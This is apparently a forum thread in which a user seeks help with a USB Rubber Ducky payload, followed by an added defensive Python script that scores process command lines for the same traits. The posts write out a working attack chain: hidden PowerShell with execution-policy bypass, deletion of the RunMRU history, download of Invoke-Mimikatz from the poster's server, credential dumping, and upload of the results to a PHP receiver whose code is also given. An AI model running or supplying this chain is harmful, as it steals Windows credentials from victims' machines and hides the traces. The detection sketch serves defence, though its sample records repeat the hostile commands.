mavieprivee


  1. Hello shr00mie,

     When I run just the line

         IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)

     in a .ps1 file, I obtain a file on my server with this:

           .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
          .## ^ ##.  "A La Vie, A L'Amour"
          ## / \ ##  /* * *
          ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
          '## v ##'   http://blog.gentilkiwi.com/mimikatz (oe.eo)
           '#####'    with 20 modules * * */
         ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

         mimikatz(powershell) # sekurlsa::logonpasswords
         ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

         mimikatz(powershell) # exit
         Bye!

     ;-(
  2. In addition to my previous message: I just found an empty file on my server: 77.xxx.xx.xx_2017-02-12_19-59-36.creds With no data ;-(
  3. Hello everyone.

     For a few days I have been trying to run my first PAYLOAD, following the purchase of the USB Rubber Ducky ... but it doesn't work ;-(

     In my inject.bin file, I have this:

         DELAY 1000
         GUI r
         DELAY 500
         STRING powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"
         ENTER
         DELAY 2000
         ALT y
         DELAY 1000
         STRING powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://www.XXXXX.fr/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://www.XXXXX.fr/rx.php',$o)"&exit
         ENTER

     NB: I can give the exact URL of my hosting by private message.

     I transferred both files to my server with FileZilla: im.ps1 (downloaded here: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 <-- I haven't changed it) and rx.php.

     In rx.php I have this code:

         <?php
         $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
         file_put_contents($file, file_get_contents("php://input"));
         ?>

     When I insert the USB key, the script apparently executes without error... But no file is created on my hosting ;-(

     I reread the whole script ... but I do not understand why it doesn't work ;-(

     Can you help me? Thanks all ;-)

     NB: I'm living in FRANCE/Paris and in Normandy (Cabourg). If you go through there, I can offer you a drink ;-)
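
Added example, not part of the posts above: a defender-side triage sketch that scores process command lines for the traits visible in the quoted commands (hidden window, execution-policy bypass, download-and-execute, upload, RunMRU clearing). The indicator weights, the threshold, the function names and the sample records are assumptions constructed for illustration.

```python
import re

# Indicators drawn from the command lines quoted in the posts above.
# Weights and the alert threshold are assumptions made for this example.
INDICATORS = {
    "hidden_window": (re.compile(r"-w\w*\s+hidden", re.I), 1),
    "exec_bypass": (re.compile(r"-(?:ep|ex\w*)\s+bypass", re.I), 1),
    "iex": (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    "download_string": (re.compile(r"\.downloadstring\s*\(", re.I), 2),
    "upload_string": (re.compile(r"\.uploadstring\s*\(", re.I), 2),
    "invoke_mimikatz": (re.compile(r"invoke-mimikatz", re.I), 3),
    "runmru_delete": (re.compile(r"reg\s+delete\s+\S*\\Explorer\\RunMRU", re.I), 2),
}

def score_command_line(cmdline):
    """Return (score, matched indicator names) for one process command line."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(cmdline)]
    return sum(INDICATORS[name][1] for name in hits), hits

def triage(events, threshold=4):
    """Keep events whose command line scores at or above the threshold."""
    alerts = []
    for ev in events:
        score, hits = score_command_line(ev["cmdline"])
        if score >= threshold:
            alerts.append({"host": ev["host"], "score": score, "hits": hits})
    return alerts

# Constructed process-creation records (hosts and URLs are placeholders).
SAMPLE_EVENTS = [
    {"host": "ws-01", "cmdline": r'''powershell -NoP -NonI -W Hidden -Exec Bypass "Start-Process cmd -A '/t:fe /k mode con lines=1 cols=18&reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f' -Verb runAs"'''},
    {"host": "ws-02", "cmdline": r'''powershell -NoP -NonI -W Hidden -Exec Bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://files.example.invalid/im.ps1');$o=Invoke-Mimikatz -DumpCreds;(New-Object Net.WebClient).UploadString('http://files.example.invalid/rx.php',$o)"'''},
    {"host": "ws-03", "cmdline": r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The benign backup job on ws-03 matches only the execution-policy indicator and stays below the threshold, which is why single traits carry low weight and combinations drive the alert.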